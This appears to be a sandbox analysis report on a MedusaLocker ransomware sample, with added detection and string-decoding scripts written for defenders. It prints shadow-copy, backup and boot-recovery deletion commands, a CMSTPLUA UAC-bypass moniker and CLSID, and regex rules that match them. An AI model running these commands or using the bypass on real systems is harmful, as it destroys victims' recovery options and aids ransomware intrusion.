

Windows Analysis Report
98j0BL6iLT.exe

Overview

General Information

Sample Name: 98j0BL6iLT.exe
Analysis ID: 791695
MD5: 646698572afbbf24f50ec5681feb2db7
SHA1: 70530bc23bad38e6aee66cbb2c2f58a96a18fb79
SHA256: 26af2222204fca27c0fdabf9eefbfdb638a8a9322b297119f85cce3c708090f0
Tags: exe, Ransomware

Detection

MedusaLocker, Babuk, Conti, Marlock
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Conti ransomware
Yara detected UAC Bypass using CMSTP
Contains functionality to bypass UAC (CMSTPLUA)
Multi AV Scanner detection for submitted file
Yara detected MedusaLocker Ransomware
Malicious sample detected (through community Yara rule)
Yara detected Babuk Ransomware
Antivirus / Scanner detection for submitted sample
Sigma detected: MedusaLocker
Yara detected Marlock Ransomware
Yara detected RansomwareGeneric
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Contains functionality to modify Windows User Account Control (UAC) settings
Spreads via windows shares (copies files to share folders)
Machine Learning detection for sample
Writes many files with high entropy
Machine Learning detection for dropped file
Writes a notice file (html or txt) to demand a ransom
Deletes shadow drive data (may be related to ransomware)
Disables UAC (registry)
May use bcdedit to modify the Windows boot settings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Creates COM task schedule object (often to register a task for autostart)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to delete services
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • 98j0BL6iLT.exe (PID: 6072 cmdline: C:\Users\user\Desktop\98j0BL6iLT.exe MD5: 646698572AFBBF24F50EC5681FEB2DB7)
    • vssadmin.exe (PID: 2304 cmdline: vssadmin.exe Delete Shadows /All /Quiet MD5: 7E30B94672107D3381A1D175CF18C147)
      • conhost.exe (PID: 2464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 5876 cmdline: wmic.exe SHADOWCOPY /nointeractive MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 5884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vssadmin.exe (PID: 5908 cmdline: vssadmin.exe Delete Shadows /All /Quiet MD5: 7E30B94672107D3381A1D175CF18C147)
      • conhost.exe (PID: 4976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 4924 cmdline: wmic.exe SHADOWCOPY /nointeractive MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vssadmin.exe (PID: 5932 cmdline: vssadmin.exe Delete Shadows /All /Quiet MD5: 7E30B94672107D3381A1D175CF18C147)
      • conhost.exe (PID: 5456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 68 cmdline: wmic.exe SHADOWCOPY /nointeractive MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svhost.exe (PID: 6088 cmdline: C:\Users\user\AppData\Roaming\svhost.exe MD5: 646698572AFBBF24F50EC5681FEB2DB7)
  • cleanup
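The process tree records three rounds each of vssadmin.exe Delete Shadows /All /Quiet and wmic.exe SHADOWCOPY /nointeractive, all spawned by PID 6072, and a copy of the sample at C:\Users\user\AppData\Roaming\svhost.exe with the same MD5 as the original. The bcdedit.exe and wbadmin commands exist only as embedded strings in this run (see the Yara hits below); they were not observed executing. The "UAC Bypass using CMSTP" signatures refer to the CMSTPLUA COM server, CLSID {3E5FC7F9-9A51-4367-9063-A120244FBEC7}, requested elevated through CoGetObject with an "Elevation:Administrator!new:" moniker; COM hosts that server in dllhost.exe /Processid:{CLSID}, and no such dllhost.exe child appears in this tree. The following detection logic is an added example and is not part of the Joe Sandbox report or of any Sigma rule it references: it replays constructed Sysmon-style process-creation records (the first six copied from the tree above, the rest labelled as constructed, including a dllhost.exe parent that this report did not observe), flags the recovery-inhibition commands, correlates them by parent PID, and separately flags children of the CMSTPLUA surrogate. The bcdedit values in the rule are standard bcdedit syntax, not text shown in this report.

```python
"""Process-creation detection for MedusaLocker's recovery-inhibition chain and
for children of the CMSTPLUA COM elevation surrogate.

Added example, not part of the Joe Sandbox report. Events are constructed
Sysmon Event ID 1 style records; the PIDs, images and command lines of the
six children of PID 6072 are copied from the report's process tree.
"""
import re
from collections import defaultdict

# CLSID of the auto-elevating CMSTPLUA COM server (same GUID as the $guid1 Yara
# hit). COM hosts it in "dllhost.exe /Processid:{CLSID}" (COM surrogate).
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"

# (rule name, image basename, command-line pattern)
RECOVERY_INHIBIT_RULES = [
    ("vssadmin_delete_shadows", "vssadmin.exe", re.compile(r"\bdelete\s+shadows\b", re.I)),
    # No "delete" verb required: the report logs "wmic.exe SHADOWCOPY /nointeractive".
    ("wmic_shadowcopy", "wmic.exe", re.compile(r"\bshadowcopy\b", re.I)),
    # Full bcdedit values are standard bcdedit syntax; the report shows only the
    # truncated prefixes "boots" and "recov" of the embedded strings.
    ("bcdedit_recovery_off", "bcdedit.exe",
     re.compile(r"/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("wbadmin_delete_systemstate", "wbadmin.exe", re.compile(r"\bdelete\s+systemstatebackup\b", re.I)),
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_recovery_inhibit(ev):
    """Return the name of the rule a process-creation event matches, or None."""
    image = basename(ev["Image"])
    for name, wanted, pattern in RECOVERY_INHIBIT_RULES:
        if image == wanted and pattern.search(ev["CommandLine"]):
            return name
    return None


def is_cmstplua_child(ev):
    """True when the parent is the dllhost.exe surrogate hosting CMSTPLUA."""
    parent = ev.get("ParentCommandLine", "").lower()
    return "dllhost.exe" in parent and CMSTPLUA_CLSID.lower() in parent


def analyze(events, min_hits=2):
    """Group recovery-inhibition children by parent PID; list CMSTPLUA spawns."""
    per_parent = defaultdict(lambda: {"parent": None, "rules": [], "children": []})
    cmstplua_children = []
    for ev in events:
        rule = match_recovery_inhibit(ev)
        if rule:
            entry = per_parent[ev["ParentProcessId"]]
            entry["parent"] = ev["ParentImage"]
            entry["rules"].append(rule)
            entry["children"].append(ev["ProcessId"])
        if is_cmstplua_child(ev):
            cmstplua_children.append(ev["ProcessId"])
    alerts = {}
    for ppid, entry in per_parent.items():
        alerts[ppid] = {
            "parent": entry["parent"],
            "hits": len(entry["rules"]),
            "distinct_rules": sorted(set(entry["rules"])),
            "children": entry["children"],
            # One shadow-copy deletion is suspicious; repeated, mixed tooling from
            # the same parent is the ransomware pattern seen in the tree above.
            "severity": "high" if len(entry["rules"]) >= min_hits else "medium",
        }
    return alerts, cmstplua_children


def ev(pid, ppid, image, cmdline, parent_image, parent_cmdline):
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image, "CommandLine": cmdline,
            "ParentImage": parent_image, "ParentCommandLine": parent_cmdline}


SAMPLE = r"C:\Users\user\Desktop\98j0BL6iLT.exe"
SYS32 = r"C:\Windows\System32"
VSS = "vssadmin.exe Delete Shadows /All /Quiet"
WMIC = "wmic.exe SHADOWCOPY /nointeractive"

EVENTS = [
    # Copied from the process tree in the report (parent PID 6072).
    ev(2304, 6072, SYS32 + r"\vssadmin.exe", VSS, SAMPLE, SAMPLE),
    ev(5876, 6072, SYS32 + r"\wbem\WMIC.exe", WMIC, SAMPLE, SAMPLE),
    ev(5908, 6072, SYS32 + r"\vssadmin.exe", VSS, SAMPLE, SAMPLE),
    ev(4924, 6072, SYS32 + r"\wbem\WMIC.exe", WMIC, SAMPLE, SAMPLE),
    ev(5932, 6072, SYS32 + r"\vssadmin.exe", VSS, SAMPLE, SAMPLE),
    ev(68, 6072, SYS32 + r"\wbem\WMIC.exe", WMIC, SAMPLE, SAMPLE),
    ev(2464, 2304, SYS32 + r"\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
       SYS32 + r"\vssadmin.exe", VSS),
    # Constructed negative case: an administrator listing shadow copies.
    ev(7000, 4100, SYS32 + r"\vssadmin.exe", "vssadmin.exe List Shadows", SYS32 + r"\cmd.exe", "cmd.exe"),
    # Constructed and NOT observed in the report: a child of the CMSTPLUA surrogate.
    ev(7100, 7050, SYS32 + r"\cmd.exe", "cmd.exe /c whoami", SYS32 + r"\dllhost.exe",
       SYS32 + r"\dllhost.exe /Processid:" + CMSTPLUA_CLSID),
]

if __name__ == "__main__":
    alerts, spawns = analyze(EVENTS)
    for ppid, a in alerts.items():
        print(f"parent {ppid} ({a['parent']}): {a['hits']} hits {a['distinct_rules']} severity={a['severity']}")
    print("children of the CMSTPLUA surrogate:", spawns)
```

Run against the constructed events, PID 6072 is reported with six hits across two rules at high severity, the List Shadows case produces nothing, and the dllhost.exe child is listed separately. The ditekSHen rule tags the technique as T1218.003; the elevation-moniker abuse is also catalogued by MITRE as T1548.002 (Bypass User Account Control), which is the more useful tag when mapping the dllhost.exe-parent detection.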
No configs have been found
Source | Rule | Description | Author | Strings
98j0BL6iLT.exe | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
98j0BL6iLT.exe | JoeSecurity_MedusaLocker | Yara detected MedusaLocker Ransomware | Joe Security
98j0BL6iLT.exe | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
      • 0x93f88:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x94028:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x9d46a:$s1: CoGetObject
      • 0x93e9c:$s2: Elevation:Administrator!new:
98j0BL6iLT.exe | MALWARE_Win_MedusaLocker | Detects MedusaLocker ransomware | ditekshen
      • 0x8163c:$s4: [LOCKER]
      • 0x8165c:$s4: [LOCKER]
      • 0x8168c:$s4: [LOCKER]
      • 0x81708:$s4: [LOCKER]
      • 0x81744:$s4: [LOCKER]
      • 0x81770:$s4: [LOCKER]
      • 0x8179c:$s4: [LOCKER]
      • 0x817cc:$s4: [LOCKER]
      • 0x81808:$s4: [LOCKER]
      • 0x8185c:$s4: [LOCKER]
      • 0x81890:$s4: [LOCKER]
      • 0x818f4:$s4: [LOCKER]
      • 0x81930:$s4: [LOCKER]
      • 0x81978:$s4: [LOCKER]
      • 0x819ac:$s4: [LOCKER]
      • 0x819e4:$s4: [LOCKER]
      • 0x81c50:$s4: [LOCKER]
      • 0x81c88:$s4: [LOCKER]
      • 0x81a10:$cmd2: vssadmin.exe Delete
      • 0x81a60:$cmd3: bcdedit.exe /set {default}
      • 0x81ac0:$cmd3: bcdedit.exe /set {default}
98j0BL6iLT.exe | RAN_MedusaLocker_Aug_2021_1 | Detect MedusaLocker ransomware | Arkbird_SOLG
      • 0x816b8:$s1: {8761ABBD-7F85-42EE-B272-A76179687C63}
      • 0x50b1:$s2: 83 C4 08 8D 8D C0 FE FF FF E8 81 F8 FF FF 8D 8D B8 FE FF FF E8 76 F8 FF FF 68 8C 26 48 00 8D 8D 09 FF FF FF E8 26 B4 FF FF 8B C8 E8 CF BA FF FF 68 B8 26 48 00 8D 8D A0 FE FF FF E8 DF 1F 00 00 ...
      • 0x81ac0:$s3: 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2E 00 65 00 78 00 65 00 20 00 2F 00 73 00 65 00 74 00 20 00 7B 00 64 00 65 00 66 00 61 00 75 00 6C 00 74 00 7D 00 20 00 62 00 6F 00 6F 00 74 00 73 00 ...
      • 0x81cd0:$s4: 42 67 49 41 41 41 43 6B 41 41 42 53 55 30 45 78
      • 0x81ba8:$s5: wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
      • 0x81a60:$s6: 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2E 00 65 00 78 00 65 00 20 00 2F 00 73 00 65 00 74 00 20 00 7B 00 64 00 65 00 66 00 61 00 75 00 6C 00 74 00 7D 00 20 00 72 00 65 00 63 00 6F 00 76 00 ...
      • 0x81a10:$s7: 76 00 73 00 73 00 61 00 64 00 6D 00 69 00 6E 00 2E 00 65 00 78 00 65 00 20 00 44 00 65 00 6C 00 65 00 74 00 65 00 20 00 53 00 68 00 61 00 64 00 6F 00 77 00 73 00 20 00 2F 00 41 00 6C 00 6C 00 ...
      • 0x81c08:$s8: 77 00 6D 00 69 00 63 00 2E 00 65 00 78 00 65 00 20 00 53 00 48 00 41 00 44 00 4F 00 57 00 43 00 4F 00 50 00 59 00 20 00 2F 00 6E 00 6F 00 69 00 6E 00 74 00 65 00 72 00 61 00 63 00 74 00 69 00 ...
      • 0x81b60:$s9: 77 00 62 00 61 00 64 00 6D 00 69 00 6E 00 20 00 44 00 45 00 4C 00 45 00 54 00 45 00 20 00 53 00 59 00 53 00 54 00 45 00 4D 00 53 00 54 00 41 00 54 00 45 00 42 00 41 00 43 00 4B 00 55 00 50
      • 0x81ba8:$s9: 77 00 62 00 61 00 64 00 6D 00 69 00 6E 00 20 00 44 00 45 00 4C 00 45 00 54 00 45 00 20 00 53 00 59 00 53 00 54 00 45 00 4D 00 53 00 54 00 41 00 54 00 45 00 42 00 41 00 43 00 4B 00 55 00 50
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\svhost.exe | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
C:\Users\user\AppData\Roaming\svhost.exe | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
        • 0x93f88:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        • 0x94028:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        • 0x9d46a:$s1: CoGetObject
        • 0x93e9c:$s2: Elevation:Administrator!new:
C:\Users\user\AppData\Roaming\svhost.exe | MALWARE_Win_MedusaLocker | Detects MedusaLocker ransomware | ditekshen
        • 0x8163c:$s4: [LOCKER]
        • 0x8165c:$s4: [LOCKER]
        • 0x8168c:$s4: [LOCKER]
        • 0x81708:$s4: [LOCKER]
        • 0x81744:$s4: [LOCKER]
        • 0x81770:$s4: [LOCKER]
        • 0x8179c:$s4: [LOCKER]
        • 0x817cc:$s4: [LOCKER]
        • 0x81808:$s4: [LOCKER]
        • 0x8185c:$s4: [LOCKER]
        • 0x81890:$s4: [LOCKER]
        • 0x818f4:$s4: [LOCKER]
        • 0x81930:$s4: [LOCKER]
        • 0x81978:$s4: [LOCKER]
        • 0x819ac:$s4: [LOCKER]
        • 0x819e4:$s4: [LOCKER]
        • 0x81c50:$s4: [LOCKER]
        • 0x81c88:$s4: [LOCKER]
        • 0x81a10:$cmd2: vssadmin.exe Delete
        • 0x81a60:$cmd3: bcdedit.exe /set {default}
        • 0x81ac0:$cmd3: bcdedit.exe /set {default}
Source | Rule | Description | Author | Strings
00000000.00000000.246011078.0000000000A64000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp | JoeSecurity_MedusaLocker | Yara detected MedusaLocker Ransomware | Joe Security
00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000000.00000003.246642887.000000000055B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MedusaLocker | Yara detected MedusaLocker Ransomware | Joe Security
00000000.00000000.246011078.0000000000A44000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_MedusaLocker | Yara detected MedusaLocker Ransomware | Joe Security
(13 further memory-dump entries not shown in this export)
Source | Rule | Description | Author | Strings
0.0.98j0BL6iLT.exe.9d0000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
0.0.98j0BL6iLT.exe.9d0000.0.unpack | JoeSecurity_MedusaLocker | Yara detected MedusaLocker Ransomware | Joe Security
0.0.98j0BL6iLT.exe.9d0000.0.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
                      • 0x93f88:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                      • 0x94028:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                      • 0x9d46a:$s1: CoGetObject
                      • 0x93e9c:$s2: Elevation:Administrator!new:
0.0.98j0BL6iLT.exe.9d0000.0.unpack | MALWARE_Win_MedusaLocker | Detects MedusaLocker ransomware | ditekshen
                      • 0x8163c:$s4: [LOCKER]
                      • 0x8165c:$s4: [LOCKER]
                      • 0x8168c:$s4: [LOCKER]
                      • 0x81708:$s4: [LOCKER]
                      • 0x81744:$s4: [LOCKER]
                      • 0x81770:$s4: [LOCKER]
                      • 0x8179c:$s4: [LOCKER]
                      • 0x817cc:$s4: [LOCKER]
                      • 0x81808:$s4: [LOCKER]
                      • 0x8185c:$s4: [LOCKER]
                      • 0x81890:$s4: [LOCKER]
                      • 0x818f4:$s4: [LOCKER]
                      • 0x81930:$s4: [LOCKER]
                      • 0x81978:$s4: [LOCKER]
                      • 0x819ac:$s4: [LOCKER]
                      • 0x819e4:$s4: [LOCKER]
                      • 0x81c50:$s4: [LOCKER]
                      • 0x81c88:$s4: [LOCKER]
                      • 0x81a10:$cmd2: vssadmin.exe Delete
                      • 0x81a60:$cmd3: bcdedit.exe /set {default}
                      • 0x81ac0:$cmd3: bcdedit.exe /set {default}
1.2.svhost.exe.e50000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
(7 further unpacked-PE entries not shown in this export)
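Every Yara hit whose matched strings are shown in this report comes from a MedusaLocker rule or from the CMSTP UAC-bypass rules; the Conti, Babuk, Marlock and RansomwareGeneric rules are listed by name only, with no strings, and the on-host artefacts (the HKCU\Software\MDSLK\Self key, the how_to_back_files.html note, the [LOCKER] strings) are MedusaLocker's. The RAN_MedusaLocker_Aug_2021_1 strings are given as hex dumps: $s3, $s6, $s7, $s8 and $s9 are UTF-16LE command lines, and $s4 is the ASCII start of a base64 string. The script below is an added example, not part of the report or of any of the quoted rules: it decodes those dumps exactly as the report shows them (truncated where the report truncates them, nothing filled in) and parses the base64 prefix of $s4 as a CryptoAPI key-blob header. The header decodes to bType PUBLICKEYBLOB, version 2, aiKeyAlg CALG_RSA_KEYX and the "RSA1" magic, i.e. an embedded RSA public key; this fits the function list under AV Detection below, where 1_2_00E65DA0 calls CryptStringToBinaryA and then CryptImportKey (decode the base64 blob and import it), while CryptGenKey, CryptEncrypt and CryptExportKey in the neighbouring functions are consistent with generating a per-victim symmetric key and exporting it wrapped under that public key. The wincrypt.h constants used are real; the script is otherwise stand-alone.

```python
"""Decode the RAN_MedusaLocker_Aug_2021_1 string hits quoted in the report.

Added example; not part of the Joe Sandbox report or of the Yara rule.
The hex dumps are copied verbatim from the report and are truncated where the
report truncates them (32 characters), so nothing beyond the visible prefix
is reconstructed.
"""
import base64
import struct

# UTF-16LE string hits, copied from the report.
WIDE_HITS = {
    "$s3": "62 00 63 00 64 00 65 00 64 00 69 00 74 00 2E 00 65 00 78 00 65 00 20 00 2F 00 73 00 65 00 74 00 20 00 7B 00 64 00 65 00 66 00 61 00 75 00 6C 00 74 00 7D 00 20 00 62 00 6F 00 6F 00 74 00 73 00",
    "$s6": "62 00 63 00 64 00 65 00 64 00 69 00 74 00 2E 00 65 00 78 00 65 00 20 00 2F 00 73 00 65 00 74 00 20 00 7B 00 64 00 65 00 66 00 61 00 75 00 6C 00 74 00 7D 00 20 00 72 00 65 00 63 00 6F 00 76 00",
    "$s7": "76 00 73 00 73 00 61 00 64 00 6D 00 69 00 6E 00 2E 00 65 00 78 00 65 00 20 00 44 00 65 00 6C 00 65 00 74 00 65 00 20 00 53 00 68 00 61 00 64 00 6F 00 77 00 73 00 20 00 2F 00 41 00 6C 00 6C 00",
    "$s8": "77 00 6D 00 69 00 63 00 2E 00 65 00 78 00 65 00 20 00 53 00 48 00 41 00 44 00 4F 00 57 00 43 00 4F 00 50 00 59 00 20 00 2F 00 6E 00 6F 00 69 00 6E 00 74 00 65 00 72 00 61 00 63 00 74 00 69 00",
    "$s9": "77 00 62 00 61 00 64 00 6D 00 69 00 6E 00 20 00 44 00 45 00 4C 00 45 00 54 00 45 00 20 00 53 00 59 00 53 00 54 00 45 00 4D 00 53 00 54 00 41 00 54 00 45 00 42 00 41 00 43 00 4B 00 55 00 50",
}
# $s4: the report shows the ASCII bytes of the first 16 characters of a base64 string.
S4_HEX = "42 67 49 41 41 41 43 6B 41 41 42 53 55 30 45 78"

# wincrypt.h constants for the BLOBHEADER that starts every CryptoAPI key blob.
BLOB_TYPES = {0x01: "SIMPLEBLOB", 0x06: "PUBLICKEYBLOB", 0x07: "PRIVATEKEYBLOB", 0x08: "PLAINTEXTKEYBLOB"}
ALG_IDS = {0x0000A400: "CALG_RSA_KEYX", 0x00002400: "CALG_RSA_SIGN"}


def decode_wide(hex_dump):
    """Decode a Yara hex dump of a UTF-16LE string."""
    raw = bytes.fromhex(hex_dump)
    if len(raw) % 2:
        # The report's $s9 dump stops after the low byte of its last character.
        raw += b"\x00"
    return raw.decode("utf-16-le")


def decode_ascii(hex_dump):
    return bytes.fromhex(hex_dump).decode("ascii")


def parse_blob_header(b64_prefix):
    """Parse BLOBHEADER {bType, bVersion, reserved, aiKeyAlg} and, for an RSA
    blob, the 4-byte RSAPUBKEY.magic that follows it."""
    raw = base64.b64decode(b64_prefix)
    b_type, b_version, reserved, alg_id = struct.unpack_from("<BBHI", raw, 0)
    magic = raw[8:12].decode("ascii", errors="replace") if len(raw) >= 12 else ""
    return {
        "bType": BLOB_TYPES.get(b_type, hex(b_type)),
        "bVersion": b_version,
        "reserved": reserved,
        "aiKeyAlg": ALG_IDS.get(alg_id, hex(alg_id)),
        "magic": magic,
    }


def decode_report_hits():
    """Return (decoded wide strings by Yara identifier, parsed $s4 blob header)."""
    wide = {ident: decode_wide(dump) for ident, dump in WIDE_HITS.items()}
    return wide, parse_blob_header(decode_ascii(S4_HEX))


if __name__ == "__main__":
    wide, header = decode_report_hits()
    for ident, text in wide.items():
        print(f"{ident}: {text!r}")
    print(f"$s4 base64 prefix {decode_ascii(S4_HEX)!r} -> {header}")
```

The five wide strings decode to the prefixes "bcdedit.exe /set {default} boots", "bcdedit.exe /set {default} recov", "vssadmin.exe Delete Shadows /All", "wmic.exe SHADOWCOPY /nointeracti" and "wbadmin DELETE SYSTEMSTATEBACKUP", which line up with the $cmd2/$cmd3 hits of MALWARE_Win_MedusaLocker and with the vssadmin.exe and wmic.exe children in the process tree.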

                        Spam, unwanted Advertisements and Ransom Demands

Source: Registry Key set | Author: Joe Security | Data: Details: 98j0BL6iLT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\98j0BL6iLT.exe, ProcessId: 6072, TargetObject: HKEY_CURRENT_USER\Software\MDSLK\Self
                        No Snort rule has matched


                        AV Detection

Source: 98j0BL6iLT.exe | ReversingLabs: Detection: 90%
Source: 98j0BL6iLT.exe | Virustotal: Detection: 74%
Source: 98j0BL6iLT.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\svhost.exe | Avira: detection malicious, Label: HEUR/AGEN.1213242
Source: C:\Users\user\AppData\Roaming\svhost.exe | ReversingLabs: Detection: 90%
Source: 98j0BL6iLT.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\svhost.exe | Joe Sandbox ML: detected
Source: 0.3.98j0BL6iLT.exe.3415240.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.98j0BL6iLT.exe.3277c40.15.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.98j0BL6iLT.exe.3456c40.4.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E660F0 CryptEncrypt
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E660D0 CryptDestroyKey
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E66090 CryptGenKey
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E661A0 CryptEncrypt
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E66150 CryptExportKey
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E66210 CryptExportKey
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E65CB0 CryptAcquireContextW,GetLastError,CryptAcquireContextW
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E655A0 CryptDestroyKey,CryptReleaseContext,CryptReleaseContext
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E65DA0 std::ios_base::good,CryptStringToBinaryA,GetProcessHeap,HeapAlloc,CryptStringToBinaryA,CryptImportKey,GetProcessHeap,HeapFree
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E65D30 CryptAcquireContextW,GetLastError,CryptAcquireContextW

                        Exploits

Source: Yara match | File source: 98j0BL6iLT.exe, type: SAMPLE
Source: Yara match | File source: 0.0.98j0BL6iLT.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svhost.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.svhost.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.246011078.0000000000A64000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.249765327.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.246642887.000000000056E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 98j0BL6iLT.exe PID: 6072, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svhost.exe PID: 6088, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED

                        Privilege Escalation

Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E70C80 CoInitialize,CLSIDFromString,IIDFromString,CoGetObject,task,CoUninitialize
Source: 98j0BL6iLT.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 23.35.236.109:443 -> 192.168.2.3:49683 version: TLS 1.2
Source: 98j0BL6iLT.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: PerfInst.pdb1 | source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bootmgfw.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.302565986.0000000003243000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\B\127930\Acrobat\Installers\InstEntryPointBlock\Release\InstEntryPointBlock.pdb (`@ | source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\armsvc.pdb A | source: 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bootmgr.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.306859083.0000000003245000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bootmgr.pdbM | source: 98j0BL6iLT.exe, 00000000.00000003.306859083.0000000003245000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\B\127930\Acrobat\Installers\Install_MaintenanceWizard\CustomActions\IWActs\Release\IWActs.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\AdobeARM.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp
